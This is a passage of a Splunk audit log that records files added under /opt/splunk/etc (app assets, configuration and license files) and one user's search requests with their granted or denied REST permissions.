action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/License_Tracking_Enhancements.png", isdir=0, size=30991, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.856, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Health_Report_Improvements_and_Search_Head_Cluster_Health_Report_Capabilities.png", isdir=0, size=25224, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.852, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Federated_Search_Support_for_On-prem_to_On-prem_Environments.png", isdir=0, size=23356, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.848, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Durable_Scheduled_Searches.png", isdir=0, size=23356, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.843, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Dashboard_Studio.png", isdir=0, size=20401, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.839, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons/Bucket_Merge_Functionality_for_Standalone_Instances.png", isdir=0, size=26208, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.735, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/images", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 18:59:45 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.731, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/icons", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Apr 20 18:15:37 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.724, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/exampleInfo.json", isdir=0, size=3847, gid=41812, uid=41812, modtime="Tue Apr 20 18:17:55 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.720, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/dashboard.css", isdir=0, size=398, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.715, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/contents.js", isdir=0, size=4290, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.711, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static/contents.css", isdir=0, size=2676, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 19:00:23 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.600, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/nav/default.xml", isdir=0, size=219, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.596, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/contents.xml", isdir=0, size=123, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.587, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Splunk_Operator_for_Kubernetes.xml", isdir=0, size=658, gid=41812, uid=41812, modtime="Tue Apr 20 18:37:41 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.580, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Search_Restriction_by_Data_Age.xml", isdir=0, size=2446, gid=41812, uid=41812, modtime="Tue Apr 20 18:40:38 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.575, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Scheduler_Observability_and_Performance_Improvements.xml", isdir=0, size=772, gid=41812, uid=41812, modtime="Tue Apr 20 18:38:01 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.571, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Performance_Improvements_for_Searchable_Rolling_Restarts.xml", isdir=0, size=1822, gid=41812, uid=41812, modtime="Tue Apr 20 18:38:17 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.567, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/New_JSON_Commands.xml", isdir=0, size=1107, gid=41812, uid=41812, modtime="Tue Apr 20 18:38:33 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.563, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/License_Tracking_Enhancements.xml", isdir=0, size=2043, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.559, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Health_Report_Improvements_and_Search_Head_Cluster_Health_Report_Capabilities.xml", isdir=0, size=3372, gid=41812, uid=41812, modtime="Tue Apr 20 18:40:00 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.554, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Federated_Search_Support_for_On-prem_to_On-prem_Environments.xml", isdir=0, size=1798, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.549, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Durable_Scheduled_Searches.xml", isdir=0, size=2508, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.544, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Dashboard_Studio.xml", isdir=0, size=4076, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views/Bucket_Merge_Functionality_for_Standalone_Instances.xml", isdir=0, size=3647, gid=41812, uid=41812, modtime="Tue Apr 20 18:32:15 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Apr 20 18:41:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 18:59:45 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Apr 20 18:54:37 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 18:59:45 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.416, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default/app.conf", isdir=0, size=378, gid=41812, uid=41812, modtime="Tue Apr 20 18:35:08 2021", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:37.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/metadata/default.meta", isdir=0, size=403, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.307, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/bin/README", isdir=0, size=63, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.304, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/static/appIcon_2x.png", isdir=0, size=736, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.299, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/static/appIconAlt_2x.png", isdir=0, size=2547, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.296, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/static/appIconAlt.png", isdir=0, size=1981, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.291, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/static/appIcon.png", isdir=0, size=440, gid=41812, uid=41812, modtime="Tue Apr 20 18:06:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.287, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 18:59:45 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.284, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/splunk_essentials_8_2_new.tgz", isdir=0, size=45, gid=41812, uid=41812, modtime="Thu Apr 22 19:06:39 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:37.280, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 19:00:04 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.276, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 19:04:57 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.272, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 18:59:45 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.268, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 18:59:45 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.160, user=n/a, action=add,path="/opt/splunk/etc/apps/user-prefs", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.152, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.148, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.144, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_metrics_workspace", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:03 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.140, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_internal_metrics", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:39 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.132, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_httpinput", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:38 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.127, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:06 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.122, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_essentials_8_2", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 22 19:06:39 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.118, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_archiver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.109, user=n/a, action=add,path="/opt/splunk/etc/apps/search", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.105, user=n/a, action=add,path="/opt/splunk/etc/apps/sample_app", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.101, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.095, user=n/a, action=add,path="/opt/splunk/etc/apps/legacy", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.091, user=n/a, action=add,path="/opt/splunk/etc/apps/learned", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:14 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.088, user=n/a, action=add,path="/opt/splunk/etc/apps/launcher", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.084, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.080, user=n/a, action=add,path="/opt/splunk/etc/apps/introspection_generator_addon", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.076, user=n/a, action=add,path="/opt/splunk/etc/apps/appsbrowser", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.072, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_webhook", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.067, user=n/a, action=add,path="/opt/splunk/etc/apps/alert_logevent", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.063, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkLightForwarder", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:37.059, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.855, user=n/a, action=add,path="/opt/splunk/etc/myinstall/splunkd.xml.cfg-default", isdir=0, size=3109, gid=41812, uid=41812, modtime="Sat May 1 18:25:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.851, user=n/a, action=add,path="/opt/splunk/etc/myinstall/splunkd.xml", isdir=0, size=3109, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:36.848, user=n/a, action=add,path="/opt/splunk/etc/users", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:37:54 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.844, user=n/a, action=add,path="/opt/splunk/etc/system", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.841, user=n/a, action=add,path="/opt/splunk/etc/splunk.version", isdir=0, size=70, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.838, user=n/a, action=add,path="/opt/splunk/etc/splunk-launch.conf.default", isdir=0, size=720, gid=41812, uid=41812, modtime="Sat May 1 18:45:27 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.834, user=n/a, action=add,path="/opt/splunk/etc/splunk-launch.conf", isdir=0, size=720, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:01 2022", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.830, user=n/a, action=add,path="/opt/splunk/etc/splunk-enttrial.lic", isdir=0, size=1725, gid=41812, uid=41812, modtime="Sat May 1 18:45:26 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.826, user=n/a, action=add,path="/opt/splunk/etc/shcluster", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.823, user=n/a, action=add,path="/opt/splunk/etc/searchLanguage.xml", isdir=0, size=21719, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.818, user=n/a, action=add,path="/opt/splunk/etc/prettyprint.xsl", isdir=0, size=1836, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.815, user=n/a, action=add,path="/opt/splunk/etc/passwd", isdir=0, size=293, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:07 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:36.811, user=n/a, action=add,path="/opt/splunk/etc/openldap", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:03 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.808, user=n/a, action=add,path="/opt/splunk/etc/myinstall", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.804, user=n/a, action=add,path="/opt/splunk/etc/modules", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.801, user=n/a, action=add,path="/opt/splunk/etc/master-apps", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.796, user=n/a, action=add,path="/opt/splunk/etc/login-info.cfg", isdir=0, size=281, gid=41812, uid=41812, modtime="Thu Oct 6 17:39:58 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:36.792, user=n/a, action=add,path="/opt/splunk/etc/log.cfg", isdir=0, size=24486, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.788, user=n/a, action=add,path="/opt/splunk/etc/log-utility.cfg", isdir=0, size=1171, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.784, user=n/a, action=add,path="/opt/splunk/etc/log-searchprocess.cfg", isdir=0, size=2710, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.779, user=n/a, action=add,path="/opt/splunk/etc/log-dfs.cfg", isdir=0, size=549, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.775, user=n/a, action=add,path="/opt/splunk/etc/log-dfs-search.cfg", isdir=0, size=555, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.771, user=n/a, action=add,path="/opt/splunk/etc/log-debug.cfg", isdir=0, size=5644, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.767, user=n/a, action=add,path="/opt/splunk/etc/log-cmdline.cfg", isdir=0, size=2503, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.763, user=n/a, action=add,path="/opt/splunk/etc/log-cmdline-debug.cfg", isdir=0, size=256, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.759, user=n/a, action=add,path="/opt/splunk/etc/log-btool.cfg", isdir=0, size=526, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.755, user=n/a, action=add,path="/opt/splunk/etc/log-btool-debug.cfg", isdir=0, size=498, gid=41812, uid=41812, modtime="Sat May 1 18:26:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.752, user=n/a, action=add,path="/opt/splunk/etc/licenses", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:18 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:41:36.748, user=n/a, action=add,path="/opt/splunk/etc/instance.cfg", isdir=0, size=54, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:08 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:36.745, user=n/a, action=add,path="/opt/splunk/etc/init.d", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.741, user=n/a, action=add,path="/opt/splunk/etc/findlogs.ini", isdir=0, size=2759, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.737, user=n/a, action=add,path="/opt/splunk/etc/disabled-apps", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.733, user=n/a, action=add,path="/opt/splunk/etc/deployment-apps", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.729, user=n/a, action=add,path="/opt/splunk/etc/datetime.xml", isdir=0, size=8182, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.725, user=n/a, action=add,path="/opt/splunk/etc/copyright.txt", isdir=0, size=57, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:36.721, user=n/a, action=add,path="/opt/splunk/etc/auth", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:08 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:41:36.716, user=n/a, action=add,path="/opt/splunk/etc/apps", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.712, user=n/a, action=add,path="/opt/splunk/etc/anonymizer", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:36.706, user=n/a, action=add,path="/opt/splunk/etc/.ui_login", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:00 2022", mode="rw-rw----", hash=] Audit:[timestamp=10-06-2022 17:41:12.795, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:41:12.654, user=user, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:41:12.621, user=user, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 17:41:12.480, user=user, action=fsh_search, info=denied ] Audit:[timestamp=10-06-2022 17:41:12.480, user=user, action=fsh_manage, info=denied ] Audit:[timestamp=10-06-2022 17:41:12.480, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:41:12.338, user=user, action=search, info=cancel, search_id='rt_md_1665078052.3'] Audit:[timestamp=10-06-2022 17:41:12.337, user=user, action=search, info=granted REST: /search/jobs/rt_md_1665078052.3] Audit:[timestamp=10-06-2022 17:41:06.239, user=user, action=search, info=completed, search_id='rt_md_1665078052.3', has_error_warn=false, fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665078052, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=1, savedsearch_name="", search_startup_time="51", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_user_d79d8decd779a2d3", app="search", provenance="UI:Search", mode="RT", is_proxied=false, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='user', search='| metadata type=sourcetypes | search totalCount > 0'] Audit:[timestamp=10-06-2022 17:40:52.754, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:40:52.754, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:40:52.291, user=user, action=select_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:40:52.290, user=user, action=search, info=granted REST: /search/jobs/rt_md_1665078052.3] Audit:[timestamp=10-06-2022 17:40:52.219, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:40:52.210, user=user, action=rtsearch, info=denied REST: /streams/rtsearch/0] Audit:[timestamp=10-06-2022 17:40:52.154, user=user, action=search, info=granted , search_id='rt_md_1665078052.3', search='| metadata type=sourcetypes | search totalCount > 0', autojoin='1', buckets=300, ttl=600, max_count=100000, maxtime=0, enable_lookups='1', extra_fields='*', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="RT"] 